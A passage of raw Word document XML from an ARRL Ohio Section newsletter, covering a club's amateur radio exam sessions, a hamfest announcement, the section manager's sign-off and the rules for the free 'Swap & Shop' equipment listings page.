                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61991682" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>VE Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901699E" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Hlk91499712"/>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>All Things Amateur Radio Association (ATARA)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> We host testing sessions every second Tuesday of the month to sign up please visit our website </w:t>
      </w:r>
      <w:hyperlink r:id="rId195" w:history="1">
        <w:r w:rsidRPr="004F4AC0">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://atara-w8atr.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and contact us at </w:t>
      </w:r>
      <w:hyperlink r:id="rId196" w:history="1">
        <w:r w:rsidRPr="004F4AC0">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>hamexams@atara-w8atr.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:p w14:paraId="4180F399" w14:textId="00A561D2" w:rsidR="004F4AC0" w:rsidRDefault="002F2055" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Please Join me in welcoming ATARA to the Ohio Section as an ARRL Affiliated club!  If you see them (or their members) please set them know that we all exist to help each other get the most out of the hobby and offer your help to them where you can.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A65941" w14:textId="7FBB0AA4" w:rsidR="00430308" w:rsidRDefault="00430308" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45942239" w14:textId="601C17E6" w:rsidR="00430308" w:rsidRDefault="00430308" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>One final thing, as John said in his South 40 column, hamfest season in Ohio starts out early – January 16</w:t>
      </w:r>
      <w:r w:rsidRPr="00430308">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00896294">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Shade, Ohio.  I plan to be there, so stop in and say HI!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E0937" w14:textId="77777777" w:rsidR="00B7564B" w:rsidRDefault="00B7564B" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5659EC41" w14:textId="3FA2CC9D" w:rsidR="004E2260" w:rsidRPr="009778EE" w:rsidRDefault="009778EE" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009778EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>73, de  Tom WB8LCD</w:t>
      </w:r>
      <w:r w:rsidR="00E705A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004E2260">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ARRL</w:t>
      </w:r>
      <w:r w:rsidR="00E705A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E2260" w:rsidRPr="009778EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OH Section Manager</w:t>
      </w:r>
      <w:r w:rsidR="004E2260">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC06B7C" w14:textId="3F215ACB" w:rsidR="004E2260" w:rsidRDefault="0084211F" w:rsidP="00E705A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidR="004E2260" w:rsidRPr="00FA1FDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>WB8LCD@ARRL.ORG</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E705A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3C048" w14:textId="7442551C" w:rsidR="00E705A5" w:rsidRPr="009778EE" w:rsidRDefault="00E705A5" w:rsidP="00E705A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009778EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>330-554-4650</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C462D19" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="swap"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="2B36A6A0" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C559532" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794A96E1" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC17CFE" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78614F22" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69196522" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8A6F04" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBCFEEF" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359B4DBD" w14:textId="77777777" w:rsidR="006107E2" w:rsidRDefault="006107E2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A35FAB0" w14:textId="008CD385" w:rsidR="00CA4394" w:rsidRDefault="0084211F" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="63974059">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24D53E" w14:textId="5CBA82E8" w:rsidR="0078669B" w:rsidRDefault="0078669B" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EDFF1A" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F38464B" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22368ACA" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73118749" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4420E84F" w14:textId="217726A0" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00A66461" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00421E35" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Swap &amp; Shop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” on the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7CEDC0" w14:textId="6F8154F0" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB9AA6D" w14:textId="62C51E7D" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00E90331" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252332032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14746E4E" wp14:editId="3739B426">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4714875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2037080" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21098"/>
                <wp:lineTo x="21411" y="21098"/>
                <wp:lineTo x="21411" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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2037080" cy="819150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00421E35" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Hey Gang, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC02F7" w14:textId="5570B0E0" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229AC92D" w14:textId="11130998" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Have you taken a look at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Swap &amp; Shop</w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> page on the Ohio Section webpage yet??   Here’s a link that will take you there…  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724782D" w14:textId="71C78BB4" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="0084211F" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId199" w:history="1">
        <w:r w:rsidR="00C71F95" w:rsidRPr="002B5181">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://arrl-ohio.org/sm/s-s.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="566B8880" w14:textId="74E24D61" w:rsidR="00A529C9" w:rsidRDefault="00A529C9" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558F234C" w14:textId="77777777" w:rsidR="00074EC6" w:rsidRDefault="00074EC6" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04901194" w14:textId="2843FD95" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Do you have equipment that you just don’t need or want anymore? Here’s a great venue to advertise it, and it’s FREE!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C3D49" w14:textId="213E268D" w:rsidR="00946410" w:rsidRDefault="00946410" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44175A9A" w14:textId="026B0CE4" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Is your club doing a fund raiser to help raise money? After a lot of thought, it was decided that the Swap &amp; Shop webpage could also contain these types of items as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB9EA9" w14:textId="77777777" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260295A2" w14:textId="5F5AEBBF" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The same rules will apply as do for the For Sales and Give-A-Ways and will only be posted for a month at a time. Please see the Terms &amp; Conditions on the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377F13A" w14:textId="7A02DFD1" w:rsidR="00BF277B" w:rsidRDefault="00BF277B" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631EAF7C" w14:textId="46B1F975" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">If your club is doing a fund raiser and wants more exposure, please forward the information to me and I’ll advertise it on the Swap &amp; Shop webpage for you.  Now, I still want to remind you that it won’t be listed in this newsletter because it would take up way too much space, so your ad will only appear on the website.  It is there for any individual to post equipment Wanted / For Sale or Give-Away as well as for Club Fund Raisers. No licensed vehicles/trailers or business advertising will be posted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F0243" w14:textId="77777777" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473B499B" w14:textId="578CA64D" w:rsidR="007C0F10" w:rsidRPr="00CF3E06" w:rsidRDefault="00421E35" w:rsidP="00CF3E06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Postings are text only (no pictures or graphics) will be posted for a maximum of 1 month from date posting and require a contact phone number or email within the posting.  Send your Wanted / For Sale or Give-Away post to:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidRPr="00421E35">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>swap@arrlohio.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1BB121" w14:textId="7D673812" w:rsidR="001656AD" w:rsidRDefault="001656AD" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA3DC3E" w14:textId="3C251B2A" w:rsidR="001656AD" w:rsidRDefault="001656AD" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768FF5AB" w14:textId="77777777" w:rsidR="007F11C2" w:rsidRDefault="007F11C2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084BACAA" w14:textId="27862065" w:rsidR="00F84C0E" w:rsidRDefault="00F84C0E" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258ECA5A" w14:textId="5A2BABC8" w:rsidR="005B42A6" w:rsidRDefault="0084211F" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="2891BE55">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2CC65" w14:textId="1FD8A259" w:rsidR="005B42A6" w:rsidRPr="00421E35" w:rsidRDefault="005071D4" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252444672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A9768A3" wp14:editId="767B8557">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>5569585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1031240" cy="1064260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21265"/>
                <wp:lineTo x="21148" y="21265"/>
                <wp:lineTo x="21148"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cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipH="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1031240" cy="1064260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005B42A6" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Back Issues of the PostScript and Ohio Section Journal</w:t>
      </w:r>
      <w:r w:rsidR="005B42A6" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F80773" w14:textId="5164B74B" w:rsidR="005B42A6" w:rsidRPr="00421E35" w:rsidRDefault="005B42A6" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
